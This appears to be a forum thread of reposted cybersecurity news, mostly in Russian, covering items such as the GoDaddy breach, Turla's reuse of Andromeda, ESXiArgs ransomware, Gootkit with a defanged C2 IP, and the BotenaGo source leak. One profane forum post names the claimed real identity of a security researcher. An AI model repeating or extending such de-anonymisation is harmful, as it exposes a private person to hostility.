Один из крупнейших в мире хостеров и регистраторов доменных имен, GoDaddy, сообщает о новой атаке на свою инфраструктуру. Хуже того, в компании пришли к выводу, что это лишь один из серии связанных инцидентов. Оказывается, неизвестные злоумышленники несколько лет имели доступ к системам компании, смогли установить малварь на ее серверы и украли исходный код.
Согласно
отчету,
поданному компанией в Комиссию по ценным бумагам и биржам США, нарушение
безопасности было обнаружено в декабре 2022 года, когда клиенты стали
сообщать, что их сайты использовались для перенаправления посетителей на
случайные домены. После проведения расследования, специалисты GoDaddy пришли к
неутешительным выводам:
Выяснилась, что в декабре 2022 года злоумышленник получили доступ к
хостинговым серверам cPanel , которые клиенты используют для управления
сайтами, размещенными у GoDaddy. Затем хакеры установили некую малварь на
серверы, и вредонос «периодически перенаправлял случайные клиентские сайты на
вредоносные».
Кроме того, сообщается, что инциденты, датированные ноябрем 2021 года и мартом 2020 года так же были связаны с этими злоумышленниками.
Напомню, что в 2021 году стало известно о странной компрометации 1,2 млн сайтов, работающих на базе WordPress. Все пострадавшие ресурсы хостились у GoDaddy, и тогда в компании заявляли, что произошел взлом и утечка данных: атакующие получили доступ к email-адресам всех затронутых клиентов, их паролям администратора в WordPress, учетным данным от sFTP и баз данных, а также приватным ключам SSL.
В 2020 году GoDaddy уведомила 28 000 клиентов о том, что в октябре 2019 года злоумышленники использовали их учетные данные для входа в хостинговый аккаунт и подключения к их учетной записи через SSH.
Теперь в GoDaddy говорят, что были обнаружены дополнительные доказательства
связи этих злоумышленников с более масштабной вредоносной кампанией,
направленной против других хостинговых компаний по всему миру и длящейся уже
много лет.
Известно, что в настоящее время GoDaddy привлекла к продолжающемуся
расследованию сторонних ИБ-экспертов, а также сотрудничает с
правоохранительными органами по всему миру для выявления первоисточника этих
многолетних атак.
Аналитики компании Mandiant сообщили, что русскоязычная кибершпионская группа Turla захватила управляющие серверы старого ботнета Andromeda, закрытого властями и ИБ-специалистами еще в 2017 году. C&C-серверы Andromeda, похоже, использовались Turla для тщательного изучения скомпрометированных хостов, чтобы найти среди них подходящие для разведывательных и шпионских операций.
Компания Mandiant, принадлежащая Google, отслеживает эту операцию Turla как кластер угроз UNC4210. Исследователи пишут, что захваченные хакерами серверы соответствуют образцам малвари Andromeda (также известной как Gamarue и Wauchos), которые были загружены на VirusTotal еще в 2013 году.
Исследователи объясняют, что участники Turla дождались истечения срока регистрации ряда доменов и захватили часть старой инфраструктуры ботнета, ликвидированного еще в 2017 году. Напомню, что тогда ботнет закрывали буквально всем миром. В совместной операции приняли участие ФБР, Интерпол, киберподразделение Европола (EC3), Евроюст, Объединенная целевая группа по борьбе с киберпреступностью (J-CAT), а также правоохранительные органы Германии. Частный сектор, в свою очередь, представляли специалисты компаний Microsoft, ESET, Registrar of Last Resort, а также ICANN, FKIE, BSI и многие другие.
«Еще в сентябре 2022 года UNC4210 перерегистрировала как минимум три C&C-домена ANDROMEDA после истечения срока их регистрации и начала профилирование жертв для выборочного развертывания KOPILUWAK и QUIETCANARY», — рассказывают специалисты Mandiant.
Click to expand...
Таким образом, Mandiant полагает, что Turla использует старые заражения Andromeda в качестве механизма для распространения собственных вредоносов, а также может воспользоваться тем фактом, что Andromeda могла распространяться через зараженные USB-накопители.
«Вредоносное ПО, распространяющееся через USB, по-прежнему является полезным вектором для получения первоначального доступа к сетям организаций, — отмечается в отчете. — Поскольку старое вредоносное ПО ANDROMEDA продолжает распространяться посредством скомпрометированных USB-устройств, перерегистрированные домены представляют опасность, поскольку новые злоумышленники могут взять их под контроль и доставить новые вредоносные программы жертвам».
Click to expand...
К примеру, в одном инциденте, проанализированном аналитиками Mandiant, зараженный USB-накопитель был использован на машине неназванной украинской организации в декабре 2021 года. Это привело к развертыванию устаревшей версии Andromeda на хосте при запуске файла вредоносной ссылки (.LNK), маскировавшейся под папку на USB-накопителе.
Так как злоумышленники использовали один из захваченных в январе 2022 года доменов (которые раньше являлись частью инфраструктуры ботента) для профилирования жертв, управляющий сервер передал на эту зараженную машину [дроппер KOPILUWAK](https://securelist.com/kopiluwak-a-new-javascript-payload- from-turla/77429/), JavaScript-утилиту для проведения сетевой разведки.

Двумя днями позже, 8 сентября 2022 года, атака перешла в заключительную фазу с
внедрением малвари QUIETCANARY (также известной под названием
[Tunnus](https://www.kaspersky.com/about/press-releases/2019_the-garden-of-
forking-paths-sophisticated-apts-diversify-toolsets)), что в итоге привело к
хищению файлов из системы жертвы.
«Эта новая техника захвата просроченных доменов, используемая широко распространенными, финансово мотивированными вредоносными программами, может обеспечить вторичную компрометацию широкого круга организаций. Кроме того, старые вредоносные программы и их инфраструктура могут быть упущены из виду защитниками, занимающимися сортировкой различных предупреждений», — предупредили специалисты.
Click to expand...
Банка России.
Создание единой централизованной базы данных о финансовых мошенниках возможно в рамках ФинЦЕРТ Банка России (автоматизированная система обработки инцидентов) для всего рынка. Об этом заявила журналистам глава регулятора Эльвира Набиуллина на уральском форуме "Кибербезопасность в финансах".
"Возможно создание единой централизованной базы данных в рамках ФинЦЕРТ. Это инфраструктура обмена данными между банками, которая позволит лучше налаживать антифродовую систему. Будем отрабатывать, она, на мой взгляд, очень перспективная. Но обмен информацией между финансовыми институтами должен быть, так как это одна из предпосылок для скорости принятия решений. А скорость - это самое важное сейчас в борьбе с мошенническими схемами", - сказала она.
Ранее в рамках форума зампредседателя правления "Сбера" Станислав Кузнецов предложил банкам объединить усилия по борьбе с мошенниками, так как объем ущерба от их действий не снижается, несмотря на усилия кредитных организаций. После того, как мошенники сталкиваются с новыми мерами защиты, они просто переходят на клиентов другого банка.
По данным Банка России, в 2022 году объем операций без согласия клиентов увеличился по сравнению с 2021 годом на 4,29% на фоне активного развития новых дистанционных платежных сервисов и роста объема денежных переводов (+39%, до 1 458,6 трлн рублей) с применением электронных средств платежа (платежные карты и иные электронные средства платежа). При этом регулятор отмечал, что банки вернули клиентам меньше похищенных средств, чем годом ранее, - 618,4 млн рублей (4,4% от всего объема краж). Такой уровень возмещения объясняется сохранением высокой доли социальной инженерии, когда граждане самостоятельно переводят средства злоумышленникам или раскрывают банковские данные.
Время и происхождение предполагаемого инцидента остаются неясными.
Федеральное бюро расследований (ФБР) США заявило, что в течение нескольких последних дней оно занималось "выявлением вредоносной киберактивности" в своей внутренней компьютерной сети.
По мнению источников в ФБР, инцидент связан с компьютерной системой, расположенной в офисе ФБР в Нью-Йорке, которая использовалась для расследования дела о распространении детской порнографии. Пока неизвестно, как злоумышленникам удалось получить доступ к сети.
«ФБР знает об инциденте и работает над получением дополнительной информации», — говорится в заявлении. «Это единичный инцидент, который удалось локализовать. ФБР не комментирует инцидент, поскольку расследование продолжается».
Hackers are pushing malware through fake website ads claiming to offer popular free software in Google search.
The reported software being faked are, among others, VLC, 7-Zip, CCleaner, Rufus and OBS.
Apparently, Google has already removed the malicious ads as they "have robust policies prohibiting ads that attempt to circumvent our enforcement by disguising the advertiser’s identity and impersonating other brands". But this doesn't mean that a larger scale attack could happen again.
Don't use Google
try using aggregators like https://searx.github.io/searx/
Or at least wear protection.
Stay safe.
Sources:
[https://mybroadband.co.za/news/secu...y-fake-malware-apps-in-google-search-
ads.html](https://mybroadband.co.za/news/security/477005-vlc-7-zip-obs-
targeted-by-fake-malware-apps-in-google-search-ads.html)
https://web.archive.org/web/2023011...via-google-search-ads-for-vlc-7-zip-
ccleaner/
Создатели малвари ESXiArgs, атакующей серверы VMware ESXi, обновили своего вредоноса. Теперь вымогатель шифрует больше данных, что значительно усложняет или делает невозможным восстановление зашифрованных виртуальных машин своими силами.
Напомню, что тысячи серверов VMware ESXi оказались взломаны новым вымогателем ESXiArgs в рамках масштабной хакерской кампании еще на прошлой неделе. Атакующие использовали уязвимость двухлетней давности (CVE-2021-21974), которая позволяла им выполнять удаленные команды на уязвимых серверах через OpenSLP (порт 427).
При этом разработчики VMware подчеркивали, что хакеры точно не используют какие-либо уязвимости нулевого дня, а OpenSLP после 2021 года вообще отключен по умолчанию. То есть злоумышленники нацеливались на продукты, которые «значительно устарели», и таких нашлось немало. По информации экспертов, взлому подверглись порядка 2800 серверов (на прошлой неделе и вовсе насчитали около 3200).
Но несколько дней назад казалось, что все уже позади: эксперты Агентства по кибербезопасности и защите инфраструктуры, организованного при Министерстве внутренней безопасности США (DHS CISA) представили скрипт https://github.com/cisagov/ESXiArgs-Recover/blob/main/recover.sh для самостоятельного восстановления зашифрованных серверов VMware ESXi.
Дело в том, что хотя многие устройства были зашифрованы, эксперты писали, что вредоносная кампания ESXiArgs в целом не увенчалась успехом, так как малварь лишь частично шифровала большие файлы и, в частности, злоумышленникам не удалось зашифровать flat-файлы, где хранятся данные виртуальных дисков. В итоге администраторы получали возможность расшифровать пострадавшие серверы, восстановив свои виртуальные машины и данные бесплатно.
Однако радость оказалась преждевременной. Журналисты Bleeping Computer сообщают, что началась вторая волна заражений ESXiArgs, и теперь хакеры используют улучшенную процедуру шифрования, которая шифрует гораздо больше данных в крупных файлах.
Так, раньше вредонос использовал скрипт encrypt.sh и следующую формулу (слегка измененную для удобочитаемости), чтобы определить, какой size_step нужно использовать: size_step=((($size_in_kb/1024/100)-1)). Теперь же шифратор вредоноса не изменился, но из скрипта encrypt.sh оказался удален сложный расчет size_step. В новой версии он попросту установлен в значение «1».
ИБ-эксперт Майкл Гиллеспи сообщил журналистам, что это изменение заставит малварь чередовать шифрование 1 МБ данных и пропуск 1 МБ данных. Таким образом, во всех файлах размером более 128 МБ теперь будут зашифрованы 50% данных, что, скорее всего, сделает их непригодными для восстановления.
Отметим, что ранее для файлов размером 450 ГБ и больше, объем пропущенных данных резко возрастал, size_step становится равен 4607, то есть шифрование 1 МБ чередовалось с пропуском 4,49 ГБ данных. Благодаря этому и становилась возможной работа инструментов для восстановления.
Также было замечено, что обновленная версия ESXiArgs оставляет немного
видоизмененную версию записки с требованием выкупа: в текст теперь не включен
биткоин-адрес, и жертве обещают предоставить его позже. Судя по всему, хакеры
заметили, что адреса их кошельков были собраны и отслеживаются ИБ-
специалистами:
Bleeping Computer предупреждает и еще об одном тревожном сигнале. Некоторые жертвы шифровальщика сообщают, что SLP на их сервере точно был отключен, однако это не помешало злоумышленникам взломать его. Также теперь пострадавшие не обнаруживают в своих системах бэкдор vmtool.py, замеченный в предыдущих атаках.
ответственности
"Белых" хакеров на территории РФ или за её пределами надо освободить от ответственности, если они действуют в интересах России, сообщил глава думского комитета по информполитике Александр Хинштейн.
"Речь идёт о том, чтобы в целом проработать освобождение от ответственности для тех лиц, кто действует в интересах Российской Федерации в сфере компьютерной информации как на территории нашей страны, так и за её пределами. Но а более детально будем говорить тогда, когда получит это чёткую формулировку", - сказал он журналистам.
Операторы вредоносного ПО Gootkit, работающие по схеме Access-as-a-Service (AaaS), вновь возвращаются на этот раз с обновленной тактикой для компрометации целевых систем.
[Trend Micro сообщают](https://www.trendmicro.com/en_us/research/22/g/gootkit- loaders-updated-tactics-and-fileless-delivery-of-cobalt-strike.html), что если в прошлом Gootkit использовал бесплатные установщики для маскировки вредоносных файлов, то теперь в ход пошли юридические документы в качестве приманки для загрузки файлов.
Выводы основаны на предыдущем отчете eSentire: [в январе сообщалось](https://thehackernews.com/2022/01/gootloader-hackers-targeting- employees.html) о широко распространенных атаках, направленных на сотрудников бухгалтерских и юридических фирм с целью развертывания вредоносных программ на зараженных системах.
Gootkit является частью растущей подпольной экосистемы брокеров доступа, которые, как известно, предоставляют другим злоумышленникам доступ к корпоративным сетям за определенную плату, прокладывая путь для реальных вредоносных атак, таких как ransomware.
Известно, что Gootkit использует безфайловые методы для доставки таких угроз, как SunCrypt и REvil (Sodinokibi), трояны Kronos и Cobalt Strike.
Цепочка атак начинается с того, что пользователь ищет определенную информацию в поисковой системе. Злоумышленники используют технику черного SEO, чтобы отобразить в результатах поиска сайт, скомпрометированный операторами Gootkit.
Он представлен как онлайн-форум, непосредственно отвечающий на его запрос. На этом форуме был размещен ZIP-архив, содержащий вредоносный файл .js, который используется для обеспечения персистентности и размещения двоичного файла Cobalt Strike в памяти зараженной системы.
ZIP-файл, со своей стороны, включает в себя файл JavaScript, который загружает двоичный файл Cobalt Strike, инструмент, используемый для действий после эксплуатации, который запускается непосредственно в памяти без файлов.
Двоичный файл Cobalt Strike, загруженный непосредственно в память системы жертвы, обращается к IP-адресу 89[.]238[.]185[.]13, который выступает в качестве Cobalt Strike C2.
По результатам исследований, ресерчеры полагают, что Gootkit Loader все еще активно разрабатывается и совершенствует свои методы.
Пользователи, вероятно, столкнутся с Gootkit в последующих кампаниях, и вполне вероятно, что он будет использовать новые средства отлова жертв.
Обладатель стильного предмета гардероба, попавший в поле зрения камеры, либо вообще не будет идентифицирован, либо система распознавания примет его за животное.
Стартап из Италии Cap_able выпустил линию одежды, которая сбивает с толку системы искусственного интеллекта, не позволяя им распознавать владельца. Об этом [пи](https://petapixel.com/2023/01/20/this-clothing-line-tricks-ai- cameras-without-covering-your-face/) [шет](https://petapixel.com/2023/01/20/this-clothing-line-tricks-ai-cameras- without-covering-your-face/) PetaPixel.
Необычная коллекция одежды, получившая название Manifesto Collection, включает различные трикотажные изделия - толстовки, брюки, футболки и платья.
Дело в том, что принт для каждого предмета одежды был создан искусственным интеллектом. Причудливые узоры способны сбить с толку системы распознавания лиц, использующие наиболее распространенное семейство архитектур для детектирования объектов YOLO.
Обладатель стильного предмета гардероба, попавший в поле зрения камеры, либо вообще не будет идентифицирован, либо система распознавания примет его за животное, замаскированное в рисунке (это может быть зебра, жираф или собака).
На каждый предмет одежды был нанесен специальный «состязательный патч», разработанный алгоритмами искусственного интеллекта, чтобы сбить с толку ПО для распознавания лиц в режиме реального времени и защитить конфиденциальность владельца.
Авторы коллекции утверждают, что разработанная коллекция одежды — это не только щит, прячущий человека от камер с системами искусственного интеллекта, но и манифест, призванный привлечь внимание к проблеме защиты от ненадлежащего использования систем распознавания лиц.
Целью Manifesto Collection является повышение осведомленности о праве на неприкосновенность частной жизни и защите биометрических данных, таких как изображение лица. Данная проблема часто недооценивается, несмотря на то, что затрагивает большинство граждан во всем мире.
Игнорирование проблемы может способствовать ущемлению прав личности, включая свободу выражения мнений, ассоциаций и свободное передвижение в общественных местах.
В Томске местного жителя ограбили и под угрозами заставили перевести почти всю
имевшуюся у него криптовалюту. Как
[сообщает](https://ren.tv/news/kriminal/909975-sviazali-i-ugrozhali-u-
zhitelia-tomska-pokhitili-bitkoiny-na-350-mln) РЕН-ТВ, инцидент произошел еще
в октябре, однако известно о нем стало только сейчас.
По данным СМИ, возле подъезда к 24-летнему томичу подошел неизвестный и,
угрожая пистолетом, потребовал перевести биткоины на свой криптовалютный
кошелек. Пострадавший отправил 85 BTC из имевшихся 90 монет.
После этого томича завели в его квартиру и привязали к кровати. До вечера с ним находился незнакомец. Когда он ушел, из квартиры пропали вещи на 400 000 рублей, в том числе наличные в рублях и долларах.
Стоимость похищенных биткоинов на момент хищения оценивалась в 350,6 млн рублей.
Позже полиция задержала подозреваемого, им оказался 36-летний местный житель. Пострадавшему возместили 36 млн рублей из похищенной суммы.
[читать тут](https://forklog.com/smi-u-zhitelya-tomska-pohitili-bitkoiny- na-350-mln-rublej/)
Российские силовики задержали злоумышленников, которые пытались похитить 250 BTC и пытали их владельца паяльной лампой в декабре 2022 года — тогда неизвестные в форме сотрудников ФСБ похитили бывшего директора похоронной фирмы Андрея Лифанова из его «Bentley».
Злоумышленники надели наручники, пакет на голову, посадили в фургон, и увезли в сторону области. В бизнесмена забрали телефон и пытая паяльной лампой, потребовали сообщить пароль от кошелька, а после его получения остановили машину и выкинули пленника в лесу.
17 января силовики задержали на юго-востоке Москвы двух обвиняемых: Романа Сафонова и Романа Обрезкова — оба ранее привлекались к ответственности.
В Москве похитили бизнесмена и угрожали ему паяльной лампой, чтоб тот назвал пароль от кошелька с 250 биткоинами
Бандиты из 90-х возвращаются, не меняя привычных методов
Бизнесмен назвал бандитам пароль, но деньгами они еще не завладели
Неизвестные в масках и камуфляже похитили предпринимателя из Москвы. Похищением злоумышленники добивались, чтоб бизнесмен назвал пароль от криптокошелька с 250 биткоинами (это 261 миллион рублей). О происшествии написал телеграм-канал Baza.
30-летнего Андрея Лифанова похитили 1 декабря. Бизнесмен сидел в своем Bentley, как вдруг к машине подъехал минивэн и оттуда выбежало несколько человек в камуфляже. Лифанову натянули пакет на голову, заковали руки в наручники и посадили в машину, после чего увезли в неизвестном направлении. Со слов предпринимателя, похитители угрожали ему паяльной лампой, требуя назвать пароль от криптокошелька.
Мужчина испугался за свою жизнь и сообщил пароль, после чего похитители остановили машину и выкинули пленника в лесу. Водитель проезжающей машины сообщил ему, что он находится рядом с деревней Сабурово в Московской области.
После освобождения Лифанов поймал такси и отправился в полицию, писать заявление. Возбуждено уголовное дело по статье «Разбой». Интересно, что преступники пока не завладели деньгами — биткоины всё еще лежат на счету Лифанова.
Click to expand...
Alleged Russian hacker Mikhail Vasiliev has been out on bail for more than a
month as the U.S. Department of Justice seeks his extradition.
According to U.S. justice officials, Vasiliev is a Russian Canadian who is
part of a global ransomware group called LockBit, which has been under
investigation for nearly three years.
The LockBit group Vasiliev is accused of being associated with made at least
$100 million in ransom demands and took tens of millions of dollars in ransom
payments from at least 1,000 cyber attacks on victims in the U.S. and around
the world.
Vasiliev, meanwhile, was charged in November after police raided his Bradford home. According to the Department of Justice, investigators found him sitting in the garage at a table with a laptop, which he was unable to lock before being placed under arrest.
Months earlier, the U.S. Department of Justice says Vasiliev's home was
searched and found to have a file containing a list of alleged prospective or
previous cybercrime victims.
Screenshots were also found tying him to LockBit with usernames and passwords
belonging to employees of an alleged Canadian LockBit victim.
Vasiliev had been behind bars in Toronto since his arrest, accused of being an
active hacker who held sensitive computer data hostage in exchange for
millions of dollars in ransom payments from victims.
Along with the cybercrime charges, Vasiliev was also charged with possession
of illegal firearms and ammo.
Provincial police say investigators arrested Vasiliev at his home in Bradford
in late October and again November 9th, 2022.
U.S. officials say Vasiliev faces a maximum of five years in prison if
convicted.
Investigators also claim to have found a Bitcoin wallet address in Vasiliev's
home, allegedly tracing it back to a ransom payment made six hours before his
arrest.
With his extradition hearing looming, Vasiliev remains out on bail requesting
disclosure of his weapons charges. He's due back in court next month.
RELATED IMAGES

Court sketch of Mikhail Vasiliev. (John Mantha)
Ресерчеры из eSentire установили личность злоумышленника, стоящего за вредоносным ПО Golden Chickens.
В сети злоумышленник известен под псевдонимом badbullzvenom и занимался реализацией Golden Chickens, также известного как Venom Spider, по схеме MaaS.
Более того, как стало известно, разработчики малвари связаны и с другими хакерскими инструментами, такими как Taurus Builder (программное обеспечение для создания вредоносных документов), More_eggs (загрузчик JavaScript), VenomLNK, TerraLoader, TerraRecon, TerraStealer, TerraTV, TerraPreter и TerraCrypt.
Согласно отчету, киберарсенал злоумышленников использовался известными хакерскими группами, включая Cobalt Group, Evilnum, FIN6, а общий ущерб от деятельности оценивается в 1,5 млрд. долл.
Деанонимизиция прошла в рамках 16-месячного расследования и OSINT-марафона, проведенного подразделением реагирования на угрозы eSentire.
Исследователи обнаружили связь учетной записи badbullzvenom с аккаунтом пользователя Frapstar, представлявшимся неким Чаком из Монреаля.
Изучение его цифрового следа позволило специалистам собрать воедино всю личность: его настоящее имя, фотографии, адрес, родителей, друзей и многое другое.
Впервые Frapstar попал в поле зрения Trend Micro еще в 2015 году, когда в одном из отчетов злоумышленник был идентифицирован как кардер и имел несколько учетных записей на разных хакерских форумах, одна из которых - badbullzvenom.
Предполагается, что Frapstar является одним из двух злоумышленников, стоящих за использованием учетной записи badbullzvenom на хакерском форуме Exploit.in.
Личность второго хакера пока не установлена, но, как предполагают ресерчеры, он может находиться в Молдове или Румынии.
Несмотря на разоблачение, ассортимент хакеров не поубавился, а продажи набирают обороты, как показывают наблюдения eSentire.
• Source: https://www.esentire.com/web-native-pages/unmasking-venom-spider
• Source: [https://s3.ca- central-1.amazonaws.c...efiles/Unmasking_VenomSpider_Report- Final.pdf](https://s3.ca-central-1.amazonaws.com/esentire-dot-com- assets/assets/resourcefiles/Unmasking_VenomSpider_Report-Final.pdf)
Представители даркнет-маркетплейса Kraken взломали своих конкурентов.
Solaris, крупный рынок даркнета, специализирующийся на наркотиках и прочих запрещенных веществах, недавно был «захвачен» более мелким конкурентом, именующимся Kraken. Его представители утверждают, что взломали сайт и базы данных Solaris 13 января 2022 года.
Сайт Solaris, расположенный в Tor-сетях, в настоящее время перенаправляется на Kraken. Эксперты по мониторингу блокчейна в Elliptic пока не сообщали об изменении адресов криптовалюты, связанных с сайтом, после 13 января 2022 года.
Торговая площадка Solaris появилась несколько месяцев назад, после ликвидации Hydra Market. Новый интернет-магазин быстро захватил около 25% рынка и обработал около 150 миллионов долларов незаконных продаж.
В отчете Resecurity, вышедшем в начале года, о появлении новых рынков наркотиков утверждалось, что на сайте Solaris зарегистрировалось около 60 000 человек после внезапной «кончины» Hydra, в то время как Kraken поглотила лишь около 10% этого количества.
Веб-сайт Solaris до взлома
Solaris была русскоязычной платформой, которая, как сообщается, была связана с Killnet, прокремлевской группой хактивистов, которая в 2022 году провела несколько DDoS-атак против организаций в западном мире. Elliptic отследила несколько пожертвований от Solaris для Killnet на сумму более 44 000 долларов в биткойнах.
В декабре 2022 года украинский аналитик киберразведки Алекс Холден заявил, что взломал сайт Solaris и украл 25 000 долларов, которые затем были пожертвованы на гуманитарную помощь благотворительной организации в Украине. В то время как Solaris оспаривал заявления о взломе и ссылался на отсутствие доказательств, позже Холден опубликовал более подробную информацию и слил исходный код, а также базы данных, предположительно связанные с рынком.
В пятницу, 13 января 2023 года, взлом повторился, но в больших масштабах. Вышеупомянутая организация Kraken объявила, что захватила инфраструктуру Solaris, репозиторий GitLab и все исходные коды проекта благодаря «нескольким огромным ошибкам в коде».
В заявлении Kraken утверждается, что им потребовалось три дня, чтобы украсть открытые текстовые пароли и ключи, хранящиеся на серверах Solaris, получить доступ к его инфраструктуре, расположенной в Финляндии, а затем загрузить все данные себе. Наконец, злоумышленники заявили, что отключили биткойн-сервер Solaris, что согласуется с наблюдениями Elliptic в отношении блокчейна.
Представители Kraken с юмором прошлись по мерам защиты, предпринятыми Solaris: «У проекта есть несколько огромных багов в коде, которые и по сей день остаются актуальными. А хранить пароли и ключи от своих серверов в открытом виде (незашифрованными) — еще бо́льшая ошибка, удел школьников с пятой парты». «Это мероприятие заняло у нас 3 дня без всякой спешки, и мы скачали абсолютно ВСЁ, что положено в таких случаях (и нас никто не остановил)», — пишут представители Kraken.
Объявление Kraken о взломе Solaris
На данный момент ни Killnet, ни кто-либо из основной команды Solaris не сделали никаких заявлений о статусе платформы и обоснованности заявлений Kraken. Однако, учитывая настроенный редиректинг на сайт Kraken, а также предыдущие заявления о взломе — информация кажется вполне достоверной.
Как оказалось, исходные коды вредоноса, которого в AT&T Alien Labs нарекли BotenaGo, доступны на GitHub с середины октября. Эксперты опасаются, что публикация повлечет рост числа вариантов Mirai-подобного бота, составляющего угрозу для миллионов роутеров и IoT-устройств.
Объявившийся три месяца назад Linux-зловред вооружен 33 эксплойтами для продуктов различных вендоров — D-Link, Netgear, Linksys, ZTE, ZyXEL. Проникнув в систему, бот работает как бэкдор, выполняя команды, подаваемые через обратный шелл или Telnet.
Анализ слитого кода вредоноса [показал](https://cybersecurity.att.com/blogs/labs-research/botenago-strike- again-malware-source-code-uploaded-to-github), что он уместился в 2891 строку. В Alien Labs полагают, что скромные размеры BotenaGo способны породить новую волну экспериментов в среде вирусописателей, а большое количество используемых эксплойтов делает его еще более привлекательным для потенциальных плагиаторов.
Похожая судьба постигла Mirai. В 2016 году его авторы выложили исходники на хакерском форуме; в итоге итерации мощного IoT-бота периодически всплывают в интернете до сих пор, являя миру новые имена — Satori, Masuta, Matryosh, Moobot.
Из-за отсутствия активной связи с C2 конечная цель заражений BotenaGo неясна. Не исключено, что зловред является частью какого-то тулкита или призван развить успех Mirai на уже зараженных устройствах.
Наблюдатели из Alien Labs продолжают фиксировать эксплойт-атаки на сетевые и IoT-устройства, отмечая невысокий уровень детектирования — по состоянию на 26 января BotenaGo распознают 23 из 61 антивируса коллекции VirusTotal.
Публикация исходного кода поставила под угрозу атак миллионы маршрутизаторов и IoT-устройств.
Исходный код вредоносного ПО BotenaGo опубликован на web-сервисе GitHub. Под угрозой оказались миллионы маршрутизаторов и IoT-устройств.
По словам специалистов из AT&T Alien Labs, загрузка исходного кода на GitHub «потенциально может привести к значительному увеличению числа новых вариантов вредоносных программ, поскольку разработчики смогут использовать исходный код и адаптировать его для своих целей
Alien Labs прогнозирует появление новых кампаний, основанных на вариантах BotenaGo и нацеленных на маршрутизаторы и IoT-устройства по всему миру. Согласно данным платформы VirusTotal, в настоящее время только 3 из 60 антивирусных решений обнаруживают новые варианты вредоносного ПО.
Теперь любой злоумышленник может использовать, модифицировать и обновлять вредоносное ПО, «или даже просто скомпилировать его как есть и использовать исходный код в качестве набора эксплоитов BotenaGo для атаки на уязвимые устройства».
Alien Labs назвала исходный код вредоносного ПО «простым, но эффективным», способным проводить вредоносные атаки, используя в общей сложности всего 2891 строку кода (включая пустые строки и комментарии). BotenaGo написан на языке программирования Golang с открытым исходным кодом и может использовать 33 уязвимости для первоначального доступа. Вредонос автоматически настраивает 33 эксплоита, предоставляя злоумышленнику «состояние готовности» для атаки на уязвимую цель и установки соответствующей полезной нагрузки в зависимости от типа цели или операционной системы.
Много тут чудик последнее время мелькал в новостях, я его как-то до этого сильно для себя не отмечал кроме как дружка Кребса + сборщика баз с паблик ресурсов ([Hold Security](https://holdsecurity.com/solutions/dark-web- monitoring/)), включая наш форум.
Но! Тут последнее время он как-то уж слишком активен был:
Украинский Робин Гуд: хакер украл у российских наркоторговцев более $25
тыс. и передал их Украине
Украинец Алекс Холден украл со счетов российских наркоторговцев в США более 25 тысяч долларов. Все средства парень перевел в Украину на благотворительность.
Об этом [сообщает](https://www.forbes.com/sites/thomasbrewster/2022/12/22/russian- dark-web-drug-market-hacked-by-ukrainian-bitcoin-donated-to-kyiv- charity/?sh=4231677d6386) издание Forbes. По его словам, Алекс взломал кошелек российской наркосети Solaris и передал деньги в киевскую благотворительную организацию "Жизнелюб".
Как доказательство, он предоставил журналистам издания все необходимые сканкопии, свидетельствующие о доступе к учетным записям администраторов Solaris и к главному кошельку, а соучредитель фонда "Жизнелюб" Тина Михайловская подтвердила получение денег.
Сам Алекс Холден родом с Киевщины, но в 80-х годах его семья уехала за границу. Виной тому стала Чернобыльская ядерная катастрофа. Следовательно, мужчина уже много лет проживает в США.
Click to expand...
Это было про взлом Соляриса. Симпатий к российском наркорынку особо не испытываю, но что-то это уже какой-то перебор:
Представители американской компании Hold Security выложили (<https://holdsecurity.com/news/2023/01/solaris-russian-drug-platform- exposed/>) в открытый доступ фрагменты дампов и баз данных, имеющих отношение к инфраструктуре маркетплейса Solaris.
Click to expand...
Сейчас уже все перелито и на Breached: <https://breached.vc/Thread-russian- Solaris-Darknet-Market-Databases-Leaked?highlight=solaris>
Мое личное мнение, что ребята уже как-то заигрались - если решил быть белой шапкой, то и будь белой шапкой. Но пиздить деньги с наркошопа и куда-то их там переводить - это уже ни в какие ворота не лезет. Кребс такой же ебантей собственно, не видит ничего зазорного в том, например, чтобы входить в чужие аккаунты на форумах или емейлы...
Но это все ладно
Меня заинтересовала другая информация, что Холден - украинец, что совсем как-
то не вяжется с его американским именем (Холден). Я решил посмотреть подробнее
и нашел его реальное имя: Алексей Гольденберг(есть все его старые емейлы и
профили, лол).
Процитирую самого Кребса:
A: I’ve known Hold Security’s Founder Alex Holden for nearly seven years. Coincidentally, I initially met him in Las Vegas at the Black Hat security convention (where I am now). Alex is a talented and tireless researcher, as well as a forthright and honest guy. He is originally from Ukraine, and speaks/reads Russian and Ukrainian fluently. His research has been central to several of my big scoops over the past year, including the breach at Adobe that exposed tens of millions of customer records.
Click to expand...
Нигде не видел этой информации в паблике - пусть будет. А то все знают только Димку Смилянца да Хорохорина, когда многие вредители остаются в тени.
Можно поменять имя на Алекс Холден, но в душе ты все равно останешься Алексеем
Гольденбергом, блядь
По словам компании, кража произошла из-за халатности банка JP Morgan Bank.
На этой неделе федеральный судья отклонил иск в отношении JP Morgan Chase Bank, согласно которому из-за халатности банка киберпреступники украли $272 млн. со счёта компании Ray-Ban в 2019 году.
Окружной судья США Льюис Лиман отклонил заявление о том, что JP Morgan нарушил свой договор и проявил халатность, но добавил, что компания EssilorLuxottica (EMTC, материнская компания фирмы Ray-Ban) может подать иск с требованием от банка возмещения ущерба.
Согласно иску EssilorLuxottica, киберпреступники совершили 243 мошеннических платежа и вывели в общей сумме $272,1 млн. со счета EMTC в Нью-Йоркском отделении банка JP Morgan. Деньги были депонированы на различные подставные счета и подставные лица по всему миру. EssilorLuxottica удалось вернуть только $172 млн.
EssilorLuxottica также заявила, что «с середины сентября 2019 года до середины декабря 2019 года EMTC неоднократно превышала свой дневной лимит овердрафта, но JP Morgan этого не делал». Ежедневные переводы со счета в Нью-Йорке должны были быть ограничены $10 млн., но иногда превышали эту сумму «более чем на $20 млн.».
Кроме того, JP Morgan Bank заявил, что Essilor не может предъявить иск против банка, «поскольку EMTC не была отправителем платежных поручений и, следовательно, не может получить возмещение».
source:
regmedia.co.uk/2023/01/05/jp_morgan_opinion_order.pdf
regmedia.co.uk/2023/01/05/jp_morg_25_april_orig_complaint.pdf
